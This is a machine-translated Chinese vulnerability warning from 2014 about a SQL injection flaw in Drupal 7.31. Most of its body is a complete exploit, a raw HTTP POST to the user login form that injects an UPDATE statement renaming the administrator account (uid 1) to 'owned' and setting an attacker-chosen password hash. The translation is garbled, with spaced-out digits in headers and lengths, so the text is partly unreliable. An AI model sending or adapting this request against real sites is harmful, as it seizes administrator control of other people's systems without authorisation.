Drupal 7.31 version of the explosion a serious SQL injection vulnerability-vulnerability warning-the black bar safety net

ID MYHACK58:62201454723
Type myhack58
Reporter 佚名
Modified 2014-10-16T00:00:00


This morning a foreign security researchers on Twitter exposed a Drupal 7.31 version of the latestSQL injectionvulnerabilities and gives using a test of the EXP code, small local structures Drupal7. 3 1 environment, tested, found that the use of the code can be successfully executed and the database increases an attacker to customize the user.

Test code:please do not for illegal purposes

POST /drupal-7.31/? q=node&destination=node HTTP/1.1 Host: User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:28.0) Gecko/2 0 1 0 0 1 0 1 For Firefox/28.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: Cookie: Drupal. toolbar. collapsed=0; Drupal. tableDrag. showWeight=0; has_js=1 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 2 3 1 name[0%2 0;update+users+set+name%3d'owned'+,+pass+%3d+'$S$DkIkdKLIvRK0iVHm99X7B/M8QC17E1Tp/kMOd1Ie8V/PgWjtAZld'+where+uid+%3d+'1';;#%2 0%2 0]=test3&name[0]=test&pass=shit2&test2=test&form_build_id=&form_id=user_login_block&op=Log+in

[1] [2] next